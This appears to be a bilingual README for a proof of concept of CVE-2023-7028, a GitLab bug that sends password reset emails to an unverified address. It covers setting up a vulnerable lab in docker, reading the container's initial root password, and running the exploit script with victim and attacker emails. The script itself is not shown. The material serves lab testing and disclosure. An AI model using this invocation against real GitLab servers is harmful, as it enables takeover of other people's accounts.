
An issue has been discovered in GitLab CE/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address.
Es wurde ein Problem in GitLab CE/EE entdeckt, das alle Versionen von 16.1 bis vor 16.1.6, 16.2 bis vor 16.2.9, 16.3 bis vor 16.3.7, 16.4 bis vor 16.4.5, 16.5 bis vor 16.5.6, 16.6 bis vor 16.6.4 und 16.7 bis vor 16.7.2 betrifft, bei dem E-Mails zum Zurücksetzen von Benutzerkontopasswörtern an eine unbestätigte E-Mail-Adresse zugestellt werden konnten.
PoC getestet auf Kali 2023.3
#sudo docker pull gitlab/gitlab-ee:16.7.0-ee.0
#sudo docker run --detach --publish 8443:443 --publish 2222:22 --publish 8080:80 --name gitlab-container --restart always --volume $GITLAB_HOME/config:/etc/gitlab --volume $GITLAB_HOME/logs:/var/log/gitlab --volume $GITLAB_HOME/data:/var/opt/gitlab --shm-size 256m gitlab/gitlab-ee:16.7.0-ee.0
Seien Sie geduldig, es dauert eine Weile, bis es startet!
SMTP im GitLab-Container einrichten https://docs.gitlab.com/omnibus/settings/smtp.html
Bei GitLab anmelden
#sudo docker exec -it gitlab-container grep "Password:" /etc/gitlab/initial_root_password Login/Passwort: root/Ergebnis des obigen grep


Als Nächstes erstellen Sie einen Benutzer mit einer gültigen E-Mail-Adresse und validieren Sie Ihr Konto.


Führen Sie den PoC aus
./cve-2023-7028.sh https://gitlab.site.com [email protected] [email protected]
Ergebnis: Eine E-Mail wird sowohl an die ursprüngliche E-Mail-Adresse als auch an die andere E-Mail-Adresse gesendet.

Workaround/Fix: https://about.gitlab.com/releases/2024/01/11/critical-security-release-gitlab-16-7-2-released/
mehr über mich ;) https://www.linkedin.com/in/duy-huan-bui/
⚠️ Haftungsausschluss: WICHTIG: Dieses Skript wird ausschließlich für Bildungszwecke, ethische Tests und rechtmäßige Verwendung bereitgestellt. Verwenden Sie es nicht auf einem System oder Netzwerk ohne ausdrückliche Genehmigung. Unbefugter Zugriff auf Computersysteme und Netzwerke ist illegal, und Benutzer, die bei unbefugten Aktivitäten erwischt werden, unterliegen rechtlichen Schritten. Der Autor ist NICHT verantwortlich für Schäden, die durch den Missbrauch dieses Skripts entstehen.